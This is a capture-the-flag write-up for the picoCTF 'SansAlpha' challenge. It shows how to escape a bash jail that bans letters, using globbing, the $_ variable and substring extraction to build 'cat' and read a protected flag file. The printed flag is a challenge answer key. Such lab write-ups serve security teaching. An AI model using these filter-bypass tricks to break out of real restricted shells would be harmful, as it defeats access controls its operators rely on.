
by sealldev
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The Multiverse is within your grasp! Unfortunately, the server that contains the secrets of the multiverse is in a universe where keyboards only have numbers and (most) symbols.
ssh -p PORT [email protected] Use password: 83dcefb7

Hint: Where can you get some letters?

Using the ssh connection command given and the password, I connect to the server:

$ ssh -p 62142 [email protected]
The authenticity of host '[]:62142 ([]:62142)' can't be established.
ED25519 key fingerprint is SHA256:n/hDgUtuTTF85Id7k2fxmHvb6rrLrACHNM6xLZ46AqQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[]:62142' (ED25519) to the list of known hosts.
[email protected]'s password:
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I start by trying a basic ls:

SansAlpha$ ls
SansAlpha: Unknown character detected

We can’t seem to use characters, this is a bash jail, and we are sandboxed to only use non-alphabet characters.

We can start by looking for files like so:

SansAlpha$ ./*
bash: ./blargh: Is a directory

This selects all files in the current directory, and we can see it hits ‘blargh’ which is a folder.

As we know there is a folder, we can use ./*/* to enter the folder and look for files:

SansAlpha$ ./*/*
bash: ./blargh/flag.txt: Permission denied

That’s where the flag is! Now to find how to read it.

There is a big list of internal bash variables but the one I find of interest is $_, as it contains information from the previous command.

$_: Special variable set to final argument of previous command executed.

So if I do ./* then do $_:

SansAlpha$ ./*
bash: ./blargh: Is a directory

SansAlpha$ $_
bash: ./on-calastran.txt: Permission denied

Look! A new file, and it has some interesting characters and, we can use bash string manipulation (under Substring Extraction) to get characters!

The unique characters in ./on-calastran.txt are enough to form cat and read a file!

We first need to do ./* to get it loaded into $_:

SansAlpha$ ./*
bash: ./blargh: Is a directory

Now, we need the characters 5-7 (starting from 0 at the .) then we need character 10, then we need to supply ./*/*.

We can do bash string manipulation like so: ${_:5:2}

SansAlpha$ ${_:5:2}
bash: ca: command not found

Woo!, now just for t.

SansAlpha$ ./*
bash: ./blargh: Is a directory

SansAlpha$ ${_:5:2}${_:10:1} ./*/*
return 0 picoCTF{7h15_mu171v3r53_15_m4dn355_36a674c0}Alpha-9, a distinctive layer within the Calastran multiverse, stands as a
sanctuary realm offering individuals a rare opportunity for rebirth and
introspection. Positioned as a serene refuge between the higher and lower
Layers, Alpha-9 serves as a cosmic haven where beings can start anew,
unburdened by the complexities of their past lives. The realm is characterized
by ethereal landscapes and soothing energies that facilitate healing and
self-discovery. Quantum Resonance Wells, unique to Alpha-9, act as conduits for
individuals to reflect on their past experiences from a safe and contemplative
distance. Here, time flows differently, providing a respite for those seeking
solace and renewal. Residents of Alpha-9 find themselves surrounded by an
atmosphere of rejuvenation, encouraging personal growth and the exploration of
untapped potential. While the layer offers a haven for introspection, it is not
without its challenges, as individuals must confront their past and navigate
the delicate equilibrium between redemption and self-acceptance within this
tranquil cosmic retreat.

This get’s the flag!

Flag: picoCTF{7h15_mu171v3r53_15_m4dn355_36a674c0}

Another Solution

We can get the required characters used ../*:

SansAlpha$ ../*
bash: ../ctf-player: Is a directory

SansAlpha$ ${_:3:1}${_:9:1}${_:4:1} ./*/*
return 0 picoCTF{7h15_mu171v3r53_15_m4dn355_36a674c0}Alpha-9, a distinctive layer within the Calastran multiverse, stands as a

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